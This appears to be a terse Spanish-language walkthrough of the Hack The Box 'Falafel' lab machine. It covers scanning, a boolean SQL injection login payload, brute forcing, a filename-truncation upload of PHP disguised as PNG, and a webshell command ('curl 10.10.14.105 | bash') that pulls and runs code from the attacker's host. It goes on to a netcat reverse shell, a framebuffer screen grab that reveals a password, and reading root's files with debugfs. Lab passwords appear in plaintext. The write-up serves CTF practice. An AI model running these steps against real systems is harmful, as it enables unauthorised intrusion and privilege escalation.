text

nmap -A -p- -oA falafel 10.129.1.83 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA falafel 10.129.1.83

nmap -sU -O -p- -oA falafel-udp 10.129.1.83

nikto -h 10.129.1.83:80

Pasted image 20210903170328.png

Pasted image 20210903171028.png

whatweb http://10.129.1.83

Pasted image 20210903171151.png

http://10.129.1.83/

Pasted image 20210903171325.png

wfuzz -c -t 200 --hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.1.83/FUZZ

Pasted image 20210903172241.png

wfuzz -c -t 200 --hc-404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z list,php-txt http://10.129.1.83/FUZZ.FUZ2Z

Pasted image 20210903172527.png

http://10.129.1.83/cyberlaw.txt

Pasted image 20210903172636.png

Proxy->Options->Miscellaneous Quitar el ultimo boton Dont send items to Proxy history or live tasks, if out of scope.

Pasted image 20210903174147.png

Target->Scope->Add Agregar http://10.129.1.83

Pasted image 20210903174435.png

Proxy->Intercept->Intercept Server Responses Agregar Intercept responses based on the following rules.

Pasted image 20210903175110.png

Pasted image 20210903184419.png

Usamos admin' and substring(username,1,1)='a'-- -

Pasted image 20210903185259.png

Creamos un cluster bomb para fuerza bruta.

Pasted image 20210903190224.png

Ponemos el siguiente para la parte de numeros.

Pasted image 20210903191630.png

La parte de texto Pasted image 20210903191655.png

Pasted image 20210903211207.png Pasted image 20210903211229.png

Corremos el codigo de arriba y lo ponemos en un archivo llamado exploit.py

Pasted image 20210903210925.png

Vamos a crackstation y vemos las credenciales.

Pasted image 20210903211339.png

credenciales chris:juggling

Pasted image 20210903211544.png

No se puede hacer mucho con el usuario de chris

Pasted image 20210903211833.png

Guardamos el hash de admin y chris

Pasted image 20210903212637.png

It verifies and has a 0 in the beginning so login es exitoso 0==0

Pasted image 20210903212743.png

Usamos las credenciales en el login.

Pasted image 20210903213513.png

Ahora podemos subir archivos de formato png.

Pasted image 20210903213537.png

Pasted image 20210903213701.png

Quitamos 4 caracteres y hacemos un archivo png

Creamos un archivo con 240 characteres y le damos un formato de php.png

Pasted image 20210904101335.png

Adquirimos los ultimos 4 caracteres

Pasted image 20210904101738.png

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q i2Ai

touch AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.png

Pasted image 20210904104120.png

Llegue a 240 caracteres y lo guarde

Pasted image 20210904110106.png

Pasted image 20210904111002.png

cat index.html

python3 -m http.server 80

Pasted image 20210904111337.png

Al final del cmd ponemos

cmd=curl 10.10.14.105 | bash

Pasted image 20210904111751.png

nc -lvnp 443

Pasted image 20210904111928.png

credenciales son las siguientes moshe:falafelIsReallyTasty

Pasted image 20210904113444.png

su moshe

Pasted image 20210904114327.png

uname -a

lsb_release -a

Pasted image 20210904115257.png

for group in g$(groups); do echo "El grupo $group"; done

for group in $(groups); do echo -e "\n[+] Listando archivo del sistema con grupo $group asignado:\n; find / \-group $group 2>/dev/null;done

Pasted image 20210904120406.png

find \-name virtual_size 2>/dev/null

cat ./sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0/virtual_size

Pasted image 20210904130814.png

cd /tmp

nc 10.10.14.105 443 Captura

Pasted image 20210904131225.png

Abrimos el archivo en gimp

Pasted image 20210904131352.png

Vemos que yossi tiene una contrasena: MoshePlzStopHackingMe!

Pasted image 20210904131602.png

su yossi

whoami

Pasted image 20210904132935.png

ls -l /dev/sda1

fdisk -l

Pasted image 20210904134007.png

debugfs /dev/sda1

cd root

cat root.txt

Pasted image 20210904134521.png

boxes

copyright©2022 Cu3rv0x all rights reserved